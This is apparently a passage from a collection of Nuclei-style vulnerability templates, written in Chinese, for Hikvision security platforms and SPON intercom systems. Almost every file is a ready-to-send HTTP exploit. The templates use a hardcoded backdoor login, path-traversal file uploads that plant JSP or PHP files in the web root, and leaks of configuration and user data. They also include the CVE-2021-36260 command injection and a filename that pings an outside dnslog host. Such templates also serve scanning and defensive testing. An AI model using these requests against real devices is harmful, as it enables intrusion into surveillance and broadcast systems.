21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
22 | Sec-Fetch-Site: none
23 | Sec-Fetch-Mode: navigate
24 | Sec-Fetch-User: ?1
25 | Sec-Fetch-Dest: document
26 | Accept-Encoding: gzip, deflate, br
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: keep-alive
29 |
30 | matchers:
31 | - type: word
32 | part: body
33 | words:
34 | - profiles
35 |
--------------------------------------------------------------------------------
/Hikvision/19海康威视SPON IP网络对讲广播系统存在后门账号poc2.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_19
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统存在后门账号poc2
4 | author: YanXi
5 | severity: low
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/login.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Length: 94
16 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
17 | Accept: application/json, text/javascript, */*; q=0.01
18 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
19 | X-Requested-With: XMLHttpRequest
20 | Sec-Ch-Ua-Mobile: ?0
21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
22 | Sec-Ch-Ua-Platform: "Windows"
23 | Sec-Fetch-Site: same-origin
24 | Sec-Fetch-Mode: cors
25 | Sec-Fetch-Dest: empty
26 | Accept-Encoding: gzip, deflate, br
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: keep-alive
29 |
30 | jsondata%5Busername%5D=administrator&jsondata%5Bpassword%5D=800823&jsondata%5Bisencrypted%5D=0
31 | matchers:
32 | - type: word
33 | part: body
34 | words:
35 | - '"res":"1"'
36 |
--------------------------------------------------------------------------------
/Hikvision/7海康威视iSecure Center综合安防管理平台 config.properties信息泄漏.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_7
2 |
3 | info:
4 | name: 海康威视iSecure Center综合安防管理平台 config.properties信息泄漏
5 | author: YanXi
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |+
15 | GET /portal/conf/config.properties HTTP/1.1
16 | Host: {{Hostname}}
17 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
18 | Sec-Ch-Ua-Mobile: ?0
19 | Sec-Ch-Ua-Platform: "Windows"
20 | Upgrade-Insecure-Requests: 1
21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
23 | Sec-Fetch-Site: none
24 | Sec-Fetch-Mode: navigate
25 | Sec-Fetch-User: ?1
26 | Sec-Fetch-Dest: document
27 | Accept-Encoding: gzip, deflate, br
28 | Accept-Language: zh-CN,zh;q=0.9
29 | Connection: keep-alive
30 |
31 | matchers:
32 | - type: dsl
33 | dsl:
34 | - "contains(body, 'serviceDirectory') && status_code == 200"
--------------------------------------------------------------------------------
/Hikvision/29海康威视SPON IP网络对讲广播系统uploadjson存在任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_29
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统uploadjson存在任意文件上传
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/uploadjson.php HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
17 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
18 | Accept-Encoding: gzip, deflate
19 | Connection: close
20 | Upgrade-Insecure-Requests: 1
21 | Content-Type: application/x-www-form-urlencoded
22 | Content-Length: 60
23 |
24 | jsondata[filename]=111.php&jsondata[data]=
25 | - |
26 | GET /lan/111.php HTTP/1.1
27 | Host: {{Hostname}}
28 | Accept: */*
29 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
30 | Accept-Encoding: gzip, deflate
31 | Accept-Language: zh-CN,zh;q=0.9
32 | matchers-condition: and
33 | matchers:
34 | - type: word
35 | part: body
36 | words:
37 | - '"res":"1"'
38 | - type: word
39 | part: body
40 | words:
41 | - 'phpinfo'
42 |
--------------------------------------------------------------------------------
/Hikvision/21海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_21
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/addscenedata.php HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
16 | Connection: close
17 | Content-Length: 183
18 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
19 | Accept-Encoding: gzip
20 |
21 | ------WebKitFormBoundary4LuoBRpTiVBo9cIQ
22 | Content-Disposition: form-data; name="upload"; filename="tt.php"
23 | Content-Type: text/plain
24 |
25 | 123
26 | ------WebKitFormBoundary4LuoBRpTiVBo9cIQ--
27 | - |+
28 | GET http://124.221.70.74:5482/images/scene/tt.php HTTP/1.1
29 | Host: {{Hostname}}
30 | Upgrade-Insecure-Requests: 1
31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
32 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
33 | Accept-Encoding: gzip, deflate, br
34 | Accept-Language: zh-CN,zh;q=0.9
35 | Connection: keep-alive
36 | matchers:
37 | - type: word
38 | part: body
39 | words:
40 | - 123
41 |
--------------------------------------------------------------------------------
/Hikvision/27海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_27
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传
4 | author: YanXi
5 | severity: info
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /upload/my_parser.php HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8dsf2vRYZDVPaW9m
16 | Accept: */*
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
18 | Accept-Encoding: gzip, deflate
19 | Accept-Language: zh-CN,zh;q=0.9
20 | Content-Length: 139243
21 |
22 | ------WebKitFormBoundary8dsf2vRYZDVPaW9m
23 | Content-Disposition: form-data; name="upload"; filename="tt.php"
24 | Content-Type: image/jpeg
25 |
26 | 1111111
27 | ------WebKitFormBoundary8dsf2vRYZDVPaW9m--
28 | - |+
29 | GET /upload/files/tt.php HTTP/1.1
30 | Host: {{Hostname}}
31 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
32 | Sec-Ch-Ua-Mobile: ?0
33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
34 | Sec-Ch-Ua-Platform: "Windows"
35 | Accept: */*
36 | Accept-Encoding: gzip, deflate, br
37 | Accept-Language: zh-CN,zh;q=0.9
38 | Connection: keep-alive
39 | matchers:
40 | - type: word
41 | part: body
42 | words:
43 | - '1111'
44 |
--------------------------------------------------------------------------------
/Hikvision/未验证/37海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.txt:
--------------------------------------------------------------------------------
1 | id: 37
2 | info:
3 | name: 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞
4 | author: Douliyoutang
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://wiki.wy876.cn/
9 | tags: tags
10 | http:
11 | - raw:
12 | - |
13 | POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
15 | Chrome/112.0.0.0 Safari/537.36 HTML
16 | Accept: */*
17 | Host: {{Hostname}}
18 | Accept-Encoding: gzip, deflate
19 | Connection: close
20 | Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408
21 | Content-Length: 339
22 |
23 | ----------------------------984514492333278399715408
24 | Content-Disposition: form-data; name="file"; filename="languages/default.jsp"
25 | Content-Type: image/png
26 |
27 | <%=123%>
28 | ----------------------------984514492333278399715408
29 | Content-Disposition: form-data; name="proxyAddress"
30 |
31 | 8.8.8.8
32 | ----------------------------984514492333278399715408--
33 | - |+
34 | GET /clusterMgr/languages/default.jsp;.js HTTP/1.1
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
36 | Chrome/112.0.0.0 Safari/537.36 HTML
37 | Accept: */*
38 | Host: {{Hostname}}
39 | Accept-Encoding: gzip, deflate
40 | Connection: close
41 |
42 |
43 | matchers:
44 | - type: word
45 | part: body
46 | words:
47 | - '123'
--------------------------------------------------------------------------------
/Hikvision/37海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_37
2 | info:
3 | name: 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://wiki.wy876.cn/
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |
13 | POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
15 | Chrome/112.0.0.0 Safari/537.36 HTML
16 | Accept: */*
17 | Host: {{Hostname}}
18 | Accept-Encoding: gzip, deflate
19 | Connection: close
20 | Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408
21 | Content-Length: 339
22 |
23 | ----------------------------984514492333278399715408
24 | Content-Disposition: form-data; name="file"; filename="languages/default.jsp"
25 | Content-Type: image/png
26 |
27 | <%=123%>
28 | ----------------------------984514492333278399715408
29 | Content-Disposition: form-data; name="proxyAddress"
30 |
31 | {{Hostname}}
32 | ----------------------------984514492333278399715408--
33 | - |+
34 | GET /clusterMgr/languages/default.jsp;.js HTTP/1.1
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
36 | Chrome/112.0.0.0 Safari/537.36 HTML
37 | Accept: */*
38 | Host: {{Hostname}}
39 | Accept-Encoding: gzip, deflate
40 | Connection: close
41 |
42 |
43 | matchers:
44 | - type: word
45 | part: body
46 | words:
47 | - '123'
--------------------------------------------------------------------------------
/Hikvision/未验证/36海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.txt:
--------------------------------------------------------------------------------
1 | id: 36
2 | info:
3 | name: 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞
4 | author: Douliyoutang
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: tags
10 | http:
11 | - raw:
12 | - |
13 | POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
15 | Accept: */*
16 | Host: {{Hostname}}
17 | Accept-Encoding: gzip, deflate
18 | Connection: close
19 | Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
20 | Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
21 | Content-Length: 233
22 |
23 | ----------------------------553898708333958420021355
24 | Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
25 | Content-Type: application/octet-stream
26 |
27 | 11111
28 | ----------------------------553898708333958420021355--
29 |
30 | - |+
31 | GET /portal/ui/login/..;/..;/y4.js HTTP/1.1
32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
33 | Accept: */*
34 | Host: {{Hostname}}
35 | Accept-Encoding: gzip, deflate
36 | Connection: close
37 | Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
38 |
39 | matchers:
40 | - type: word
41 | part: body
42 | words:
43 | - 1111
--------------------------------------------------------------------------------
/Hikvision/36海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_36
2 | info:
3 | name: 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞
4 | author: YanXi
5 | severity: medium
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |
13 | POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
15 | Accept: */*
16 | Host: {{Hostname}}
17 | Accept-Encoding: gzip, deflate
18 | Connection: close
19 | Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
20 | Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
21 | Content-Length: 233
22 |
23 | ----------------------------553898708333958420021355
24 | Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
25 | Content-Type: application/octet-stream
26 |
27 | 11111
28 | ----------------------------553898708333958420021355--
29 |
30 | - |+
31 | GET /portal/ui/login/..;/..;/y4.js HTTP/1.1
32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
33 | Accept: */*
34 | Host: {{Hostname}}
35 | Accept-Encoding: gzip, deflate
36 | Connection: close
37 | Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
38 |
39 | matchers:
40 | - type: word
41 | part: body
42 | words:
43 | - 1111
--------------------------------------------------------------------------------
/Hikvision/15海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_15
2 |
3 | info:
4 | name: 海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露
5 | author: YanXi
6 | severity: info
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | http:
13 | - raw:
14 | - |-
15 | POST /services/IWsBaseService.IWsBaseServiceHttpSoap11Endpoint HTTP/1.1
16 | Host: {{Hostname}}
17 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
18 | Content-Length: 569
19 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
20 | Accept-Encoding: gzip, deflate
21 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
22 | Authorization: Basic YWRtaW46MTIzNDU2
23 | Connection: close
24 | Connection: close
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 | 1
33 |
34 | 1
35 |
36 |
37 |
38 |
39 |
40 |
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - 'getAllUserInfo'
--------------------------------------------------------------------------------
/Hikvision/4海康威视IP摄像机NVR设备固件远程代码执行漏洞(CVE-2021-36260).yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_4
2 | info:
3 | name: 海康威视IP摄像机NVR设备固件远程代码执行漏洞(CVE-2021-36260)
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | metadata:
10 | verified: true
11 | hunter-query: header="671-1e0-587ec4a1"
12 | tags: Hikvision
13 | http:
14 | - raw:
15 | - |-
16 | PUT /SDK/webLanguage HTTP/1.1
17 | Host: {{Hostname}}
18 | Cache-Control: max-age=0
19 | Accept: application/json, text/javascript, */*; q=0.01
20 | X-Requested-With: XMLHttpRequest
21 | If-Modified-Since: 0
22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
23 | Accept-Encoding: gzip, deflate, br
24 | Accept-Language: zh-CN,zh;q=0.9
25 | Cookie: language=en
26 | Connection: keep-alive
27 | Content-Type: application/x-www-form-urlencoded
28 | Content-Length: 79
29 |
30 | $(ifconfig>webLib/x)
31 | - |+
32 | GET /x HTTP/1.1
33 | Host: {{Hostname}}
34 | Upgrade-Insecure-Requests: 1
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
37 | Accept-Encoding: gzip, deflate, br
38 | Accept-Language: zh-CN,zh;q=0.9
39 | Cookie: language=en
40 | Connection: keep-alive
41 |
42 | matchers:
43 | - type: word
44 | part: body
45 | words:
46 | - addr
47 |
--------------------------------------------------------------------------------
/Hikvision/38海康威视-综合安防管理平台-file--任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: hikvision-isecurecenter-clusters-fileupload
2 |
3 | info:
4 | name: hikvision-isecurecenter-clusters-fileupload
5 | author: hikvision-isecurecenter-clusters-fileupload
6 | severity: high
7 | tags: Hikvision
8 |
9 | variables:
10 | a1: '{{rand_base(5)}}'
11 | a2: '{{rand_base(10)}}'
12 | a3: '{{rand_base(20)}}'
13 | http:
14 | - raw:
15 | - |
16 | POST /center/api/clusters/ssl/file;.js HTTP/1.1
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
18 | Accept: */*
19 | Host: {{Hostname}}
20 | Accept-Encoding: gzip, deflate
21 | Content-Type: multipart/form-data; boundary=--------------------------{{a3}}
22 |
23 | ----------------------------{{a3}}
24 | Content-Disposition: form-data; name="file"; filename="../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{{a1}}.jsp"
25 | Content-Type: application/octet-stream
26 |
27 | <%out.println("{{a2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
28 | ----------------------------{{a3}}
29 | Content-Disposition: form-data; name="proxyAddress"
30 |
31 | 127.0.0.1
32 | ----------------------------{{a3}}--
33 |
34 | - |
35 | GET /clusterMgr/{{a1}}.jsp;.js HTTP/1.1
36 | Host: {{Hostname}}
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
38 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
39 | Accept-Encoding: gzip, deflate
40 |
41 | matchers:
42 | - type: dsl
43 | dsl:
44 | - "contains(body_2, '{{a2}}')"
--------------------------------------------------------------------------------
/Hikvision/dnslog/31海康威视综合安防管理平台productFile远程代码执行.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_31
2 |
3 | info:
4 | name: 海康威视综合安防管理平台productFile远程代码执行
5 | author: Douliyoutang
6 | severity: high
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | flow: http(1) && http(2)
13 |
14 |
15 | http:
16 | - raw:
17 | - |+
18 | GET /iac/iasService/v1/register HTTP/1.1
19 | Host: {{Hostname}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
21 |
22 | matchers:
23 | - type: word
24 | internal: true
25 | part: header
26 | words:
27 | - 'Token'
28 |
29 | extractors:
30 | - type: kval # type of the extractor
31 | name: Token
32 | internal: true
33 | kval:
34 | - Token
35 |
36 | - raw:
37 | - |
38 | POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
39 | Host: {{Hostname}}
40 | Token: {{Token}}
41 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
42 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
43 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
44 | Accept-Encoding: gzip, deflate
45 | Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
46 | Content-Length: 346
47 |
48 | -----------------------------142851345723692939351758052805
49 | Content-Disposition: form-data; name="file"; filename="`ping 4cbdeq.dnslog.cn`.zip"
50 | Content-Type: application/zip
51 |
52 | 123
53 | -----------------------------142851345723692939351758052805--
54 |
--------------------------------------------------------------------------------
/Hikvision/22海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_22
2 | info:
3 | name: 海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /php/busyscreenshotpush.php HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
16 | Content-Length: 181
17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
18 | Accept-Encoding: gzip, deflate
19 | Accept-Language: zh-CN,zh;q=0.9
20 | Connection: close
21 | Content-Type: application/x-www-form-urlencoded
22 | Upgrade-Insecure-Requests: 1
23 |
24 | jsondata[caller]=1&jsondata[callee]=1&jsondata[imagename]=..\..\..\Wnmp\WWW\upload\1_0_xjayuiwqzj.php&jsondata[imagecontent]=PD9waHAgZWNobyAxMTEqMTExOyB1bmxpbmsoX19GSUxFX18pOyA/Pg==
25 | - |+
26 | GET {{RootURL}}/upload/1_0_xjayuiwqzj.php HTTP/1.1
27 | Host: {{Hostname}}
28 | Upgrade-Insecure-Requests: 1
29 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
30 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
31 | Accept-Encoding: gzip, deflate, br
32 | Accept-Language: zh-CN,zh;q=0.9
33 | Connection: keep-alive
34 | matchers-condition: or
35 | matchers:
36 | - type: word
37 | part: body
38 | words:
39 | - '12321'
40 | - type: word
41 | part: body
42 | words:
43 | - '"res":"-2"'
--------------------------------------------------------------------------------
/Hikvision/6海康威视iSecure Center综合安防管理平台center任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_6_1
2 | info:
3 | name: 海康威视iSecure Center综合安防管理平台center任意文件上传poc1
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /center/api/files;.js HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: python-requests/2.26.0
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 | Connection: close
19 | Content-Length: 259
20 | Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c
21 |
22 |
23 | --ea26cdac4990498b32d7a95ce5a5135c
24 | Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.jsp"
25 | Content-Type: application/octet-stream
26 |
27 |
28 | 332299402
29 | --ea26cdac4990498b32d7a95ce5a5135c--
30 | - |+
31 | GET /clusterMgr/153107606.jsp;.js HTTP/1.1
32 | Host: {{Hostname}}
33 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
34 | Sec-Ch-Ua-Mobile: ?0
35 | Sec-Ch-Ua-Platform: "Windows"
36 | Upgrade-Insecure-Requests: 1
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
38 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
39 | Sec-Fetch-Site: none
40 | Sec-Fetch-Mode: navigate
41 | Sec-Fetch-User: ?1
42 | Sec-Fetch-Dest: document
43 | Accept-Encoding: gzip, deflate, br
44 | Accept-Language: zh-CN,zh;q=0.9
45 | Connection: keep-alive
46 |
47 | matchers:
48 | - type: dsl
49 | dsl:
50 | - "contains(body_2, '332299402') "
51 |
--------------------------------------------------------------------------------
/Hikvision/6海康威视iSecure Center综合安防管理平台center任意文件上传poc2.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_6_2
2 | info:
3 | name: 海康威视iSecure Center综合安防管理平台center任意文件上传poc2
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /center/api/files;.html HTTP/1.1
14 | Host: {{Hostname}}
15 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
16 | Content-Length: 305
17 |
18 | ------WebKitFormBoundary9PggsiM755PLa54a
19 | Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
20 | Content-Type: application/zip
21 |
22 | <%out.print("test3");%>
23 |
24 | ------WebKitFormBoundary9PggsiM755PLa54a--
25 | - |+
26 | GET /portal/ui/login/..;/..;/new.jsp HTTP/1.1
27 | Host: {{Hostname}}
28 | Cookie: JSESSIONID=CtIv-KIpVXW-2Gv92nxiwdl-HLFx4bpMzqlU8yc3; curtTabId=all; configMenu=
29 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
30 | Sec-Ch-Ua-Mobile: ?0
31 | Sec-Ch-Ua-Platform: "Windows"
32 | Upgrade-Insecure-Requests: 1
33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
34 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
35 | Sec-Fetch-Site: none
36 | Sec-Fetch-Mode: navigate
37 | Sec-Fetch-User: ?1
38 | Sec-Fetch-Dest: document
39 | Accept-Encoding: gzip, deflate, br
40 | Accept-Language: zh-CN,zh;q=0.9
41 | Connection: keep-alive
42 |
43 | matchers:
44 | - type: dsl
45 | dsl:
46 | - "contains(body_2, 'test3') "
47 |
--------------------------------------------------------------------------------
/Hikvision/11海康威视iSecure Center综合安防管理平台lm任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_11
2 | info:
3 | name: 海康威视iSecure Center综合安防管理平台lm任意文件上传
4 | author: YanXi
5 | severity: high
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /lm/api/files;.css HTTP/1.1
14 | Host: {{Hostname}}
15 | User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 | Connection: keep-alive
19 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
20 | Content-Length: 347
21 | SL-CE-SUID: 39
22 |
23 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M
24 | Content-Disposition: form-data; name="file"; filename="../../../../../tomcat85linux64.1/webapps/els/static/axaaxs.jsp"
25 | Content-Type: application/zip
26 |
27 | <% out.println("testaxssax");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
28 | ------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
29 | - |+
30 | GET /els/static/axaaxs.jsp HTTP/1.1
31 | Host: {{Hostname}}
